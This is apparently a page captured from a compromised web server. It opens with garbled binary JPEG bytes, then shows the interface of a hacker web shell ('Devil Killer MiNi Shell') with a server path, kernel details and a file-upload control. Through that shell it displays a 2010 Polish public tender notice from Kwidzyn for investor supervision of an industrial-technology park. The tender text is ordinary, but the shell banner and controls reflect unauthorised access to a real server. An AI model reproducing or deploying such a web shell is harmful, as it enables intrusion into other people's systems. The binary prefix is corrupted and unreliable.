JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100507/112253-N-2010.html

<p class="kh_header"><b>Kwidzyn: NADZÓR INWESTORSKI dla Projektu: Utworzenie Kwidzyńskiego Parku Przemysłowo-Technologicznego z centrum energii odnawialnej</b><br>
<b>Numer ogłoszenia: 112253 - 2010; data zamieszczenia: 07.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kwidzyński Park Przemysłowo-Technologiczny Sp. z o.o. , Górki 3, 82-500 Kwidzyn, woj. pomorskie, tel. 0-55 279 70 79, faks 0-55 279 70 79.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Podmiot prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> NADZÓR INWESTORSKI dla Projektu: Utworzenie Kwidzyńskiego Parku Przemysłowo-Technologicznego z centrum energii odnawialnej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa nadzoru inwestorskiego dla Projektu: Utworzenie Kwidzyńskiego Parku Przemysłowo-Technologicznego z centrum energii odnawialnej.
Celem umowy jest ustanowienie efektywnego nadzoru nad realizacją robót budowlanych zapewniającego prawidłowe wykonawstwo robót budowlanych i uzyskanie zaplanowanych efektów użytkowych przy zachowaniu terminów i nakładów przewidzianych w umowie o roboty budowlane a także efektywne rozliczenie Projektu. Wykonawca winien zagwarantować efektywną kontrolę wykonania robót zgodnie z przedmiotem zamówienia i harmonogramem realizacji, zapewnić odpowiednią (wysoką) jakość robót, dostaw oraz zapewnić dyscyplinę wydatkowania nakładów.
Do zakresu obowiązków Wykonawcy będzie należało w szczególności:
a) weryfikacja kompleksowej dokumentacji projektowo-kosztorysowej na etapie jej odbioru od Projektanta,
b) udział w procedurze odpowiedzi na pytania Oferentów na etapie postępowania przetargowego na roboty budowlane,
c) pełnienie funkcji Inspektora nadzoru inwestorskiego oraz koordynowanie prac inspektorów nadzoru budowlanego,
d) pełnienie funkcji Koordynatora procesu inwestycyjnego,
e) bezstronne i obiektywne uczestnictwo w procesie inwestycyjnym,
f) wspieranie działań Zamawiającego oraz asysta techniczna w szczególności przy sporządzaniu Raportów przejściowych i Raportu Końcowego Projektu, wniosków o płatność, promocji projektu itp.
W ramach Projektu realizowane są dwa podzadania inwestycyjne:
- Podzadanie A: budowa zespołu budynków Centrum Kwidzyńskiego Parku Przemysłowo-Technologicznego (z Centrum Energii Odnawialnej): obiekt biurowo-wystawienniczo-technologiczny o pow. ok. 4 300 m2 z demonstracyjnym domem pasywnym energooszczędnym o pow. ok. 150 m2,
- Podzadanie B: budowa infrastruktury dróg wewnętrznych wraz z pełnym uzbrojeniem: ogółem długość ok. 2 km.
Szczegółowy opis zakresu planowanych robót budowlanych zawarto w załącznikach B i C do SIWZ.
Obowiązki Wykonawcy
Wykonawca będzie pełnił obowiązki wynikające z zawartej z Zamawiającym umowy a w szczególności:
a) weryfikował kompleksową dokumentację projektowo-kosztorysową przekazywaną przez Projektanta,
b) uczestniczył w procedurze wyboru wykonawcy robót budowlanych w tym w szczególności udzielał i pośredniczył w udzielaniu odpowiedzi na pytania oferentów,
c) zatwierdzał Plan Zapewnienia Jakości sporządzony przez Wykonawcę Robót Budowlanych,
d) sprawował nadzór inwestorski zgodnie z przepisami polskiego prawa budowlanego,
e) sprawdzał jakości materiałów i urządzeń przed wbudowaniem,
f) prowadził monitorowanie i raportowanie przebiegu robót budowlanych,
g) prowadził i odpowiadał za prawidłowość rozliczeń finansowych,
h)współpracował z Zamawiającym w zakresie upowszechniania informacji i konsultacji społecznych,
i) uzyskiwał zgodę Zamawiającego na zatrudnienie Podwykonawców w ramach realizowanej umowy, 
j) uzyskiwał zgodę Zamawiającego na wydawanie poleceń zmiany w sposobie realizacji robót budowlanych, przedłużanie czasu wykonania Kontraktu na roboty budowlane, ustalanie stawek i cen na dodatkowe roboty budowlane,
k) sporządzał raporty dla Zamawiającego z postępu prac (okresowe, roczne i końcowy),
l) posiadał pełną polisę ubezpieczeniową od odpowiedzialności cywilnej z tytułu prowadzonej działalności gospodarczej.
Każde polecenie, zawiadomienie, zgoda, decyzja, zatwierdzenie lub zaświadczenie Wykonawcy winno mieć formę pisemną.
Okres trwania Umowy
Umowa zawarta będzie po rozstrzygnięciu prowadzonego postępowania przetargowego, na okres odbioru dokumentacji projektowej od Projektanta, okres prowadzenia postępowania o zamówienie publiczne związane z wyborem wykonawcy robót budowlanych, okres prowadzenia robót budowlanych, sporządzenia i zatwierdzenia Raportu Końcowego oraz uzyskania pozwolenia na użytkowanie.
Przewiduje się zakończenie trwania umowy do dnia 30.06.2012 r.
Okres nadzoru nad budową
Czas trwania nadzoru nad poszczególnymi robotami budowlanymi wynika z harmonogramów ich realizacji, a zakres działań Wykonawcy będzie obejmował:
a) nadzór budowlany wszystkich branż nad wykonywanymi robotami zgodnie z wymaganiami wynikającymi z umową na roboty budowlane i polskim prawem budowlanym,
b) administrowanie robotami budowlanymi w sposób zapewniający prowadzenie pełnej wymaganej przez Zamawiającego sprawozdawczości,
c) sprawdzanie i zatwierdzanie dokumentów Wykonawcy robót budowlanych,
d) zatwierdzanie zakończonych robót budowlanych w imieniu Zamawiającego,
e) przeprowadzenie rzeczowego i finansowego rozliczenia prowadzonych robót budowlanych,
f) prowadzenie odbiorów częściowych i końcowych robót budowlanych,
Okres zgłaszania wad
Zamawiający przewiduje, że w Umowie na roboty budowlane uzyska okresy gwarancji, które będą wykraczały poza okres umowy z Wykonawcą. W związku z tym Wykonawca jest zobowiązany w ramach rozliczeń końcowych swojej działalności przygotować zestawienie zakresów i terminów gwarancji przechodzących poza okres jego działalności.
Zakres zadań Wykonawcy
Prace przygotowawcze
a) Weryfikacja przekazywanej przez Projektanta kompleksowej dokumentacji projektowo-kosztorysowej,
b) Udział w postępowaniu na wybór wykonawcy robót budowlanych,
c) Wizyta Wykonawcy w terenie i miejscu, w którym będą realizowane roboty budowlane,
d) Przygotowanie logistyczne działania Zespołu Wykonawcy.
Prowadzenie nadzoru budowlanego 
a) Przekazanie Wykonawcy robót budowlanych terenu budowy,
b) Przekazanie Wykonawcy robót budowlanych kompletu dokumentacji projektowej i wymaganych dokumentów.,
c) Przekazanie Wykonawcy robót budowlanych zarejestrowanego Dziennika Budowy wraz z wypełnioną stroną tytułową i wpisami o podjęciu funkcji nadzoru budowlanego i kierowania budową,
d) Polecenie Wykonawcy robót budowlanych sporządzenia dokumentacji fotograficznej wszystkich istotnych elementów Robót, w tym w szczególności robót zanikających i ulegających zakryciu, a w odniesieniu do robót sieciowych, dodatkowo teren budowy i teren przyległy, przed rozpoczęciem robót i po ich zakończeniu,
e) Powiadomienie właściwych organów nadzoru budowlanego o zamiarze rozpoczęcia robót przez Wykonawcę, stosownie do decyzji o pozwoleniu na budowę,
f) Powiadomienie Zamawiającego o rozpoczęciu robót przez Wykonawcę robót budowlanych,
g) Uzyskanie pozwolenia na użytkowanie w imieniu Zamawiającego.
Kontrola realizacji robót budowlanych
Bez przesądzania o kompletności poniższego wykazu, do obowiązków Wykonawcy przy kontroli realizacji robót budowlanych należą w szczególności:
a) kontrola poprawnego wyznaczenia w terenie obiektów budowlanych przez służbę geodezyjną,
b) kontrola organizacji ruchu drogowego w związku z wykonywanymi robotami w ramach poszczególnych robót budowlanych,
c) kontrola jakości wykonywanych robót, wbudowywanych elementów i stosowanych materiałów, zgodności robót z warunkami pozwolenia na budowę, obowiązującymi przepisami prawa i normami, zasadami bezpieczeństwa oraz z zasadami dobrego wykonawstwa,
d) kontrola zgodności wykonywanych robót budowlanych z dokumentacją projektową i z umową zawartą z Wykonawcą robót budowlanych oraz wydawanie poleceń zmian i uzupełnień dokumentacji w ustalonym przez Wykonawcę trybie, po wcześniejszym uzyskaniu zgody od Zamawiającego,
e) powiadamianie Zamawiającego i autora dokumentacji oraz wyznaczanie terminów poprawiania dokumentacji w każdym przypadku stwierdzenia jakichkolwiek błędów, opuszczeń, niejasności, sprzeczności, niestosowności i innych wad w dokumentacji projektowej, przed rozpoczęciem budowy bądź w toku jej realizacji,
f) sprawdzanie użytych materiałów, sposobu ich magazynowania i transportu,
g) kontrola zgodności postępu robót z programem wykonywania robót i planem płatności dla poszczególnych kontraktów,
h) dokonywanie odbiorów częściowych,
i) dokonywanie odbiorów robót zanikających i ulegających zakryciu,
j) wyznaczanie terminów, w których zostaną przeprowadzone testy, rozruchy, próby eksploatacyjne i próby końcowe, uczestniczenie w nich i rozpatrzenie ich wyników,
k) kontrola i weryfikacja dokumentacji powykonawczej dostarczanej przez Wykonawcę robót budowlanych w ramach zawartej z nim umowy, w tym do pozwolenia na użytkowanie,
l) sprawdzanie i potwierdzanie zakończonych robót,
m) kontrola rozliczeń, potwierdzanie sum do wypłaty oraz kwot zatrzymanych, weryfikacja i potwierdzanie Miesięcznych Rozliczeń Wykonawcy robót budowlanych,
n) kontrola należytego stopnia szczegółowości instrukcji obsługi i konserwacji urządzeń (DTR).
Inspektorzy Nadzoru personelu kluczowego Wykonawcy  powinni być obecni na terenie budowy w każdym dniu roboczym Wykonawcy robót budowlanych wymagającego pobytu na budowie Inspektora i przebywać tam tak długo, jak tego wymaga skuteczność nadzoru. W czasie każdorazowego pobytu na Terenie Budowy Inspektor Nadzoru ma obowiązek dokonania przeglądu dziennika budowy oraz potwierdzenia dokonanych czynności stosownym zapisem. Inspektorzy Nadzoru mają prawo dokonywania zapisów dokonanych czynności wyłącznie w zakresie powierzonych im czynności nadzoru.
Wykonawca ma obowiązek ujawniać nieprawidłowości występujące przy wykonywaniu robót z jednoczesnym pisemnym powiadomieniem Zamawiającego, Wykonawcy robót budowlanych i odnotowaniem w Dzienniku Budowy.
Wykonawca ma obowiązek każdorazowo zawiadomić Zamawiającego i właściwy organ nadzoru budowlanego i inne właściwe organy, których właściwości wynikają z przepisów prawa budowlanego i przepisów szczególnych w przypadku stwierdzenia w toku realizacji robót naruszenia przepisów prawa budowlanego, bezpieczeństwa budowy lub ochrony środowiska, a także stwierdzenia rażących uchybień technicznych.
Narady z Wykonawcą robót budowlanych, Zamawiającym i innymi zaangażowanymi stronami 
Wykonawca organizuje narady z Wykonawcą robót budowlanych, Zamawiającym i innymi zaangażowanymi stronami, na których rozwiązywane są wszelkie sprawy związane z realizacją robót. Protokołuje sprawy rozpatrywane na takiej naradzie oraz niezwłocznie dostarcza kopie odpowiedniego protokółu wszystkim uczestnikom narady i Zamawiającemu. Narady odbywać się będą minimum raz w tygodniu, w dniach ustalonych z Zamawiającym.
Wykonawca zobowiązany jest uczestniczyć w naradach organizowanych przez Zamawiającego dotyczących realizacji Kontraktu na roboty budowlane.
Dokumentacje powykonawcze
Wykonawca jest zobowiązany sprawdzić i zatwierdzić, przygotowaną przez Wykonawcę robót budowlanych kompletną dokumentację powykonawczą.
Wykonawca winien potwierdzać prawidłowość wykonywania przez Wykonawcę robot budowlanych pomiarów geodezyjnych powykonawczych robót budowlanych i sprawdzać faktyczne usytuowanie obiektów budowlanych z dokumentacją projektową. Wykonanie tych czynności Wykonawca winien potwierdzać odpowiednim zapisem w Dzienniku Budowy.
Sprawdzanie na życzenie Zamawiającego jakości materiałów i urządzeń u dostawców
Na życzenie Zamawiającego Wykonawca winien przygotować program kontroli jakości robót budowlanych oraz ewentualnych odbiorów przed wbudowaniem materiałów i urządzeń. Sprawdzanie jakości materiałów i urządzeń Wykonawca przeprowadzał będzie stosownie do uzgodnionego programu.
Organizacja obiegu dokumentów na budowie 
Wykonawca przygotuje instrukcje określające zakres, formę i tryb przekazywania dokumentów, zgodnie z wymaganiami prawa budowlanego, wymogów raportowania i monitorowania oraz zasady sporządzania dokumentacji fotograficznej, zapewniające prowadzenie efektywnego nadzoru.
Instrukcja i zasady, o których mowa wyżej winny być dostarczone Zamawiającemu do akceptacji w okresie przygotowawczym, a Wykonawcy robót budowlanych po zawarciu umowy na roboty budowlane, ale nie później niż 14 dniu po przekazaniu terenu budowy. 
Aktualizacje instrukcji i zasad winny być przedstawiane Zamawiającemu i Wykonawcy robót budowlanych nie później niż 3 dni przed ich wprowadzeniem do stosowania. 
Raporty Wykonawcy dla Zamawiającego
Wymagania ogólne dotyczące raportowania 
Raporty powinny być dostarczone do Zamawiającego w odpowiedniej ilości egzemplarzy. Tylko Zamawiający ma prawo do przyjęcia lub odrzucenia raportów. 
Wykonawca: 
a) przedstawi wszystkie niezbędne dokumenty potwierdzające wykonanie obowiązków Wykonawcy zgodnie z umową,
b) stworzy system przesyłu wersji pisemnej i elektronicznej uzgodnionej z Zamawiającym z odpowiednimi nagłówkami dla całości korespondencji i dokumentacji związanej z umową na roboty budowlane,
c) przygotuje raporty w formacie A-4 drukowane na obydwu stronach papieru wraz z odpowiednimi nagłówkami i stopkami.
Rysunki i harmonogramy powinny być przekazywane w formacie A3 w celu włączenia ich do raportu. Raporty muszą być trwale spięte.
Przedstawianie i zatwierdzanie raportów
Wszystkie raporty będą zatwierdzane przez Zamawiającego.
Zamawiający, w terminie 30 dni od otrzymania, powiadomi Wykonawcę o zatwierdzeniu lub odrzuceniu otrzymanych przez niego raportów przejściowych kwartalnych/półrocznych i raportu końcowego, z podaniem przyczyn ich odrzucenia.
Jeżeli Zamawiający nie przekaże na piśmie żadnych uwag do raportów w terminie 30 dni od daty ich przekazania Zamawiającemu, raporty będą uważane za zatwierdzone przez Zamawiającego. 
Wszystkie raporty powinny być przygotowane w języku polskim w 2 kopiach wraz z 2 kopiami elektronicznymi.
Forma raportu, okresowego, rocznego i końcowego powinna być zgodna z wymaganiami sprawozdawczości RPO-WP dla poddziałania 1.5.1 oraz przedłożona do zatwierdzenia przez Zamawiającego w terminie 2 tygodni od podpisania umowy.
Wykonawca ma obowiązek przygotowania dodatkowych raportów, jeżeli ich zażąda Zamawiający lub, gdy w trakcie realizacji umowy przygotowanie takiego raportu Wykonawca uzna za konieczne.
Wymagania szczegółowe dotyczące raportowania 
Wykonawca będzie przedstawiał Zamawiającemu następujące raporty:
Raport okresowy 
Raport okresowy winien zawierać sprawozdanie z działalności Wykonawcy na budowie, tylko pośrednio odnoszące się do działalności Wykonawcy, winien być przedłożony w przeciągu 5 dni od ostatniego dnia okresu, którego raport dotyczy.
W raporcie Wykonawca winien uwzględnić roboty zakończone i rozpoczęte w okresie sprawozdawczym, roboty planowane, podwykonawstwo, zasoby ludzkie, sprzęt Wykonawcy robót budowlanych. Powinny być również uwzględnione zagadnienia, które bezpośrednio dotyczą budowy kontrolowanej przez Wykonawcę, jak problemy BHP, kontrola jakości, analiza zgodności postępu robót z harmonogramem rzeczowo-finansowym, napotkane trudności i środki zaradcze, zmiany, roszczenia. 
Raport powinien się kończyć załącznikami m.in. kopią harmonogramu Wykonawcy robót budowlanych z zaznaczeniem aktualnych działań oraz tych, których postęp i zakończenie może być zagrożone, w następujących formatach: w postaci tabelarycznej prezentującej porównanie faktycznego i planowanego postępu.
Raport powinien też zawierać prezentację w formie graficznej porównującą rzeczywisty i planowany postęp robót od ich rozpoczęcia.
Raport winien zawierać m.in. tabelaryczne streszczenia:
a) polecenia zmian wydane do danego dnia,
b) roszczenia zgłoszone przez Wykonawcę robót budowlanych,
c) świadectwa płatności przejściowych poświadczone przez Wykonawcę,
d) inne zagadnienia wynikające z umowy na roboty budowlane np. roszczenia wynikające z polisy ubezpieczeniowej,
e) ocenę realizacji umowy na roboty budowlane,
f) ocenę roboczych kontaktów pomiędzy Wykonawcą a Wykonawcą robót budowlanych, z wyszczególnieniem wszelkich napotkanych problemów związanych z administracją, nadzorem i kontrolą wraz z sugestiami ich rozwiązania, rozkład pracy personelu nadzorującego Wykonawcy wraz z odpowiednią informacją, a w szczególności dotyczącą ilości przeprowadzonych nadzorów na budowie, odbytych spotkań, dostępności urządzeń itp. 
Wykonawca będzie dostarczał na koniec każdego miesiąca prognozę planów płatności dla kolejnych trzech miesięcy dla umowy na roboty budowlane, sporządzaną na podstawie planów płatności Wykonawcy robót budowlanych.
Raport roczny
Raport roczny dotyczący wykonania i postępu prac Wykonawcy winien być przygotowany i przedłożony w ciągu 10 dni od zakończenia okresu, którego raport dotyczy.
Raport winien być krótki i winien zawierać:
a) informacje dotyczące wykonanych prac w trakcie raportowanego okresu,
b) raport dotyczący pracy inspektorów nadzoru Wykonawcy,
c) informacje dotyczące stanu zaawansowania robót,
d) informacje dotyczące ewentualnych odchyleń od zakładanej ceny ryczałtowej, 
e) informacje o występujących problemach, opis zagrożeń wraz z propozycją działań dla ich wyeliminowania,
f) zaktualizowane programy wykonywania robót i plany płatności przedłożone przez Wykonawcę robót budowlanych,
g) zestawienie kontroli wykonanych przez Wykonawcę oraz zestawienie kontroli wykonanych przez Instytucje zewnętrzne, z podaniem terminu przeprowadzenia kontroli, nazwisk kontrolerów i tematyki kontroli przeprowadzonych w okresie sprawozdawczym,
h) ocenę wykonania zaleceń pokontrolnych.
Raport roczny  powinien zawierać tabelaryczne zestawienie poświadczonych płatności przejściowych, na których wyraźnie będą wskazane daty otrzymania zapłaty przez Wykonawcę, kwota pozostająca do zapłaty wynikająca z wszelkich płatności zaliczkowych oraz kwoty zatrzymane. Dodatkowo, wartość zakończonych robót powinna być zaprezentowana w formie graficznej, tak, aby pokazywała porównanie pomiędzy rzeczywistymi i planowanymi wartościami od momentu ich rozpoczęcia.
Raport roczny powinien także zawierać podsumowanie, w formie tabelarycznej wypłat dokonanych na rzecz Wykonawcy.
Raport końcowy
W ciągu 14 dni po podpisaniu protokołu odbioru całości robót budowlanych, Wykonawca przedstawi raport końcowy Zamawiającemu. 
Raport ten winien zawierać :
a) kopię protokołu odbioru,
b) zweryfikowane rysunki powykonawcze, na których będą zaznaczone wszelkie zmiany w stosunku do projektów budowlanych, 
c) wartość robót,
d) opis realizacji robót z wyszczególnieniem powodów opóźnień i/lub wydłużenia czasu robót,
e) raporty dotyczące testów, rozruchów, prób eksploatacyjnych i prób końcowych, 
f) szczegóły dotyczące wszelkich pozwoleń wymaganych dla wykonania robót, 
g) opis procedur bezpieczeństwa na terenie budowy,
h) ocenę jakości materiałów wraz z dokumentami poświadczającymi spełnienie wymagań jakościowych, 
i) szczegóły dotyczące napotkanych trudności administracyjnych i sposoby ich przezwyciężania, 
j) pełną dokumentację fotograficzną z realizacji robót budowlanych. 
Wykonawca winien przedłożyć, jako część Raportu Końcowego zbiorczą Dokumentację Zapewnienia Jakości zawierającą wszystkie oryginalne wnioski o dokonanie kontroli, formularze testowe i wszystkie certyfikaty odnoszące się do robót konstrukcyjnych, materiałów oraz urządzeń.
Dokumentacja Zapewnienia Jakości powinna być tworzona na bieżąco w trakcie realizacji robót i powinna być dostępna do kontroli przez Zamawiającego w każdym rozsądnym czasie.
Zarządzanie projektem i organizacja pracy Wykonawcy
Ogólne zasady organizacji pracy Wykonawcy
Inspektorzy Nadzoru powinni być obecni na terenie budowy Wykonawcy w każdym dniu roboczym wymagającym ich obecności i przebywać tam tak długo, jak tego wymaga skuteczność nadzoru. W czasie każdorazowego pobytu na terenie budowy Inspektor Nadzoru ma obowiązek dokonania przeglądu dziennika budowy oraz potwierdzenia dokonanych czynności stosownym zapisem, przy czym poszczególni Inspektorzy mają prawo dokonywania zapisów dokonanych czynności, wyłącznie w zakresie powierzonych im czynności nadzoru. 
Inżynier Rezydent winien być obecny na terenie budowy (w tym zapleczu budowy, rozumianym jako pomieszczenia biurowe budowy i Wykonawcy) co najmniej w każdym dniu roboczym, przez okres wykonywania robót budowlanych. Zapis ten nie przesądza o braku konieczności pobytu na terenie budowy Inżyniera Rezydenta w innych okresach, o ile wymagać tego będzie należyte wykonanie umowy.
Wykonawca ma obowiązek ujawniać nieprawidłowości występujące przy wykonywaniu robót z jednoczesnym pisemnym powiadomieniem Zamawiającego, Wykonawcy robót budowlanych i odnotowaniem w Dzienniku Budowy.
Wykonawca ma obowiązek ubezpieczyć personel od następstw nieszczęśliwych wypadków.
W trakcie nieobecności Kierownika Zespołu lub jakiejkolwiek osoby z personelu kluczowego związanej z urlopem lub przedłużającą się chorobą Wykonawca zapewni czasowe zastępstwo na cały okres nieobecności tak, aby uniknąć opóźnień w realizacji robót budowlanych. Takie czasowe zastępstwo zostanie zaproponowane Zamawiającemu na piśmie w celu zatwierdzenia. Osoba zastępująca winna posiadać wykształcenie i doświadczenie wymagane jak dla Personelu Kluczowego i złożyć niezbędne oświadczenia i dokumenty zgodnie z wymogami Prawa budowlanego.
Kluczowy personel
Kluczowy personel Wykonawcy wymagany przez Zamawiającego obejmuje:
a) Inżynier Rezydent (Kierownik Zespołu) - 1 osoba,
b) Inspektor Nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń - 2 osoby,
c) Inspektor Nadzoru w specjalności konstrukcyjno-budowlanej bez ograniczeń - 2 osoby,
d) Inspektor Nadzoru w specjalności architektonicznej bez ograniczeń w zakresie kierowania robotami budowlanymi w odniesieniu do architektury obiektu  - 1 osoba,
e) Inspektor Nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń - 2 osoby,
f) Inspektor Nadzoru w specjalności telekomunikacyjnej bez ograniczeń - 1 osoba,
g) Inspektor Nadzoru w specjalności drogowej bez ograniczeń - 2 osoby,
h) Specjalista ds. rozliczeń finansowych - 1 osoba,
i) Administrator projektu - 1 osoba.
Wymagania w stosunku do personelu 
Wymieniony personel kluczowy nie wyczerpuje wymagań dla rzetelnego wypełnienia zobowiązań Wykonawcy i winien być traktowany jako minimalne wymogi Zamawiającego, a Wykonawca jest odpowiedzialny za jego prawidłowy dobór.
W szczególności Wykonawca jest odpowiedzialny za zapewnienie zastępstwa każdego z członków personelu kluczowego w przypadku jego nieobecności. 
Zapewnienie warunków realizacji 
Zamawiający udostępni Wykonawcy nieodpłatnie pomieszczenie biurowe w pobliżu placu budowy. Pomieszczenie wyposażone będzie w energię elektryczną i ogrzewanie oraz dostęp do wody.
Zamawiający udostępni Wykonawcy nieodpłatnie salę do narad koordynacyjnych w miarę potrzeb.
Ewentualne dodatkowe pomieszczenia biurowe niezbędne Wykonawcy dla realizacji niniejszego Zamówienia, Wykonawca zabezpieczy we własnym zakresie.
Wykonawca zabezpieczy we własnym zakresie wyposażenie niezbędne dla realizacji niniejszego Zamówienia, w tym w szczególności:
- transport dla własnego użytku w czasie realizacji Umowy,
- umeblowanie i wyposażenie biura, w szczególności w telefon stacjonarny, faks, sprzęt komputerowy łącznie z niezbędnym oprogramowaniem i programami wspierającymi dla całego personelu Wykonawcy,
- inne wyposażenie biurowe np. kserokopiarki, faks, skaner, aparat cyfrowy.
Koszty wyposażenia i utrzymania biura jak również wszelkie koszty związane z eksploatacją środków transportu poniesie Wykonawca. 
Wymagania szczególne
Monitoring będzie prowadzony przez Zamawiającego na podstawie danych przedłożonych przez Wykonawcę. Do monitorowania uprawnione będą również jednostki uczestniczące w finansowaniu i kontroli wydatkowania środków.
Wszystkie publikacje i informacje prasowe oraz cała korespondencja i inne dokumenty dotyczące działań wynikających z realizacji niniejszej Umowy powinny zawierać wyraźną informację o finansowaniu Projektu przez UE oraz logo UE w formacie i według projektu zatwierdzonego przez Zamawiającego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

